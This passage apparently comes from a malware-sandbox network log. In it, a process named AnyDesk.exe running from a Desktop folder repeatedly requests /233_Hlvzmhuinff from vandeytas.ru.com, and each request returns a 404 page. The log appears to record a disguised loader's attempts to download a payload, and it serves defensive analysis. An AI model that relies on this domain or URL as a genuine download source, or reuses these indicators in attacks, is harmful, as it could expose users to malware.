          2024-11-26 07:11:38 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          14192.168.2.64979250.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:40 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:40 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:40 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:40 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          15192.168.2.64979950.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:42 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:42 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:42 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:42 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          16192.168.2.64980650.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:44 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:45 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:44 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:45 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          17192.168.2.64981250.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:46 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:47 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:47 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:47 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          18192.168.2.64981950.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:48 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:49 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:49 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:49 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          19192.168.2.64982650.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:51 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:51 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:51 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:51 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          20192.168.2.64983350.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:53 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:53 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:53 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:53 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          21192.168.2.64983950.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:55 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:55 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:55 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:55 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          22192.168.2.64984550.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:57 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:11:57 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:11:57 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:11:57 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          23192.168.2.64985250.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:11:59 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:00 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:00 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:00 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          24192.168.2.64985950.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:01 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:02 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:02 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:02 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          25192.168.2.64986750.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:03 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:04 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:04 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:04 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          26192.168.2.64987450.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:06 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:06 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:06 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:06 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          27192.168.2.64988050.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:08 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:09 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:09 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
